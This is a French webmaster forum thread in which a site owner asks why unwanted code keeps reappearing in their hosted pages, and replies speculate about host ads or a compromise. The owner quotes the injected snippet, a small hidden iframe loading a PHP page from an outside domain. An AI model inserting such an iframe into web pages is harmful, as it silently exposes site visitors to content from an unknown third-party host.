Rajout inatendue d'HTML
daftgan
-
ThEBiShOp Messages postés 8411 Date d'inscription Statut Contributeur Dernière intervention -
ThEBiShOp Messages postés 8411 Date d'inscription Statut Contributeur Dernière intervention -
Bonjour,
J'ai un petit problème avec un site que j'ai crée il y a un peu près 1 an de sa, je remarque qu'il y a du rajout de code indépendamment de moi (il n'en n'était rien au début du site), avec même une iframe qui s'est implanté dans la page!
de même, en reprenant le fichier html pour le modifier, le fichier était comme neuf, sans ces "rajouts", qui revienne une fois que je replace ce fichier dans le serveur via fillezilla.
qui quelqu'un aurait une solution, je lui en serait infiniment reconnaissant!! =)
J'ai un petit problème avec un site que j'ai crée il y a un peu près 1 an de sa, je remarque qu'il y a du rajout de code indépendamment de moi (il n'en n'était rien au début du site), avec même une iframe qui s'est implanté dans la page!
de même, en reprenant le fichier html pour le modifier, le fichier était comme neuf, sans ces "rajouts", qui revienne une fois que je replace ce fichier dans le serveur via fillezilla.
qui quelqu'un aurait une solution, je lui en serait infiniment reconnaissant!! =)
A voir également:
- Rajout inatendue d'HTML
- Editeur html - Télécharger - HTML
- Html br - Forum HTML
- Espace html - Astuces et Solutions
- Formate de rajout ✓ - Forum Disque dur / SSD
- Br html ✓ - Forum Webmastering
8 réponses
Bonjour,
je parie que ton hébergement est un hébergement gratuit ?
L'hébergeur place des pubs sur tes pages web, j'imagine que ça doit être dans les conditions générale que tu as du accepter lorsque tu t'es inscrit chez eux.
je parie que ton hébergement est un hébergement gratuit ?
L'hébergeur place des pubs sur tes pages web, j'imagine que ça doit être dans les conditions générale que tu as du accepter lorsque tu t'es inscrit chez eux.
Non, même pas, c'est cela qui m'inquiète justement, j'ai pris l'hébergement le plus minimal chez OVH!
voila le code! (et merci beaucoup de porter attention à ma question!)
<iframe src="http://fraukesart.de/cnt.php" style="position: absolute; height: 31px; width: 42px; left: 500px; top: 100px;"> <html> <head> </head> <body> <pre></pre> </body> </html> </iframe> </div>
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
C'est bizarre... je trouve plein de sites avec ce même code, mais aucune info valable...
tu as essayé de demander à OVH s'ils avaient une idée de ce que ça pouvait être ?
tu as essayé de demander à OVH s'ils avaient une idée de ce que ça pouvait être ?